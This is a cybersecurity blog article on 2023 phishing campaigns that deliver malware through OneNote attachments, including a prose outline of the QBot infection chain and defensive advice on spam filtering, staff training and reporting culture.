March 21, 2023 By Doug Bonderud 4 min read

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

To combat this cybersecurity change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: Businesses aren’t expecting attacks in .one files. Next is efficacy: As noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through on malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IOT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QBot attacks start with an embedded HTML application (HTA) that retrieves QBot when users click on malicious links. Then, an HTA script uses the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into the Windows Assistive Technology file — AtBroker.exe — to conceal itself from security tools.

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.

Next is cybersecurity education which focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from more generic recommendations such as seeking out grammar or spelling errors. Instead, it takes a more considered approach that focuses on questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see if staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.

More from Risk Management

2024 trends: Were they accurate?

4 min read - The new year always kicks off with a flood of prediction articles; then, 12 months later, our newsfeed is filled with wrap-up articles. But we are often left to wonder if experts got it right in January about how the year would unfold. As we close out 2024, let’s take a moment to go back and see if the crystal balls were working about how the year would play out in cybersecurity.Here are five trends that were often predicted for…

2024 roundup: Top data breach stories and industry trends

3 min read - With 2025 on the horizon, it’s important to reflect on the developments and various setbacks that happened in cybersecurity this past year. While there have been many improvements in security technologies and growing awareness of emerging cybersecurity threats, 2024 was also a hard reminder that the ongoing fight against cyber criminals is far from over.We've summarized this past year's top five data breach stories and industry trends, with key takeaways from each that organizations should note going into the following…

Black Friday chaos: The return of Gozi malware

4 min read - On November 29th, 2024, Black Friday, shoppers flooded online stores to grab the best deals of the year. But while consumers were busy filling their carts, cyber criminals were also seizing the opportunity to exploit the shopping frenzy. Our system detected a significant surge in Gozi malware activity, targeting financial institutions across North America. The Black Friday connection Black Friday creates an ideal environment for cyber criminals to thrive. The combination of skyrocketing transaction volumes, a surge in online activity…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today